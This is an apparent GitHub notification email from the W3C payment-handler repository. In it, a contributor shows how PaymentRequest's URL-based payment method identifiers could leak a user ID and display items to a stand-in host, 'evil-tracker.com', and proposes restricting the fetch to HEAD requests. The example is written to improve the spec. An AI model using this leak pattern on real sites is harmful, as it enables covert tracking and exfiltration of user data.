- From: Marcos Cáceres <notifications@github.com>
- Date: Mon, 04 Mar 2019 22:39:17 -0800
- To: w3c/payment-handler <payment-handler@noreply.github.com>
- Cc: Subscribed <subscribed@noreply.github.com>
Received on Tuesday, 5 March 2019 06:39:40 UTC
Given:
```JS
const methodData = [
{
supportedMethods: "https://evil-tracker.com/?userid=123",
},
];
const details = {
total: {
label: "Total due",
amount: { currency: "USD", value: "0.0" },
},
};
new PaymentRequest(methodData, details);
```
This means that one can do:
```JS
const methodData = [
// Leak stuff... not a real payment handler
{
supportedMethods: `https://evil-tracker.com/?userid=123&displayItems=${details.diplayItems}`,
},
{
supportedMethods: "basic-card"
}
];
```
I wonder if for URL based payment method identifiers we should allow any URL structure, but only allow HEAD requests to `new URL(./well-known/payment-handler.json, handlerOrigin)` with a restricted referrer policy and everything stripped?
--
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/w3c/payment-handler/issues/334
Received on Tuesday, 5 March 2019 06:39:40 UTC